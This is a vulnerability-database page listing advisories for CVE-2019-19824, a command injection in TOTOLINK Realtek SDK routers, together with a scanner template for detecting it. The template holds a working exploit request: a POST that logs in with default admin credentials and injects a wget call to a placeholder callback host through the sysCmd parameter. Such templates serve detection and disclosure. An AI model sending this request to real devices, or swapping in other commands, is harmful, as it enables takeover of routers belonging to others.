| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Realtek SDK Information Disclosure / Code Execution Exploit | 27 Jan 202000:00 | – | zdt | |
| CVE-2019-19824 | 5 Nov 201900:00 | – | attackerkb | |
| CVE-2019-19824 | 14 Nov 202400:00 | – | circl | |
| TOTOLINK Realtek SDK Routers Command Injection (CVE-2019-19824) | 16 Nov 202000:00 | – | checkpoint_advisories | |
| CVE-2019-19824 | 27 Jan 202017:03 | – | cve | |
| CVE-2019-19824 | 27 Jan 202017:03 | – | cvelist | |
| CVE-2019-19824 | 27 Jan 202018:15 | – | nvd | |
| CVE-2019-19824 | 27 Jan 202018:15 | – | osv | |
| Realtek SDK Information Disclosure / Code Execution | 24 Jan 202000:00 | – | packetstorm | |
| Design/Logic Flaw | 27 Jan 202018:15 | – | prion |
id: CVE-2019-19824
info:
name: TOTOLINK Realtek SD Routers - Remote Command Injection
author: gy741
severity: high
description: |
TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
remediation: |
Apply the latest firmware update provided by the vendor to fix the vulnerability.
reference:
- https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
- https://nvd.nist.gov/vuln/detail/CVE-2019-19824
- https://sploit.tech
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-19824
cwe-id: CWE-78
epss-score: 0.25135
epss-percentile: 0.97667
cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: totolink
product: a3002ru_firmware
tags: cve,cve2019,totolink,rce,router,vkev,vuln
http:
- raw:
- |
POST /boafrm/formSysCmd HTTP/1.1
Host: {{Hostname}}
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4a0a00473045022100ef5957bbd8e3539b2f208d69a70a17e82be2b51d68da00b9af616b4f4c89fb0902201e5c6773df5cfd7b61b7bf5cdfe4f1e10e41ebd548389764dca002086ab66d4b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation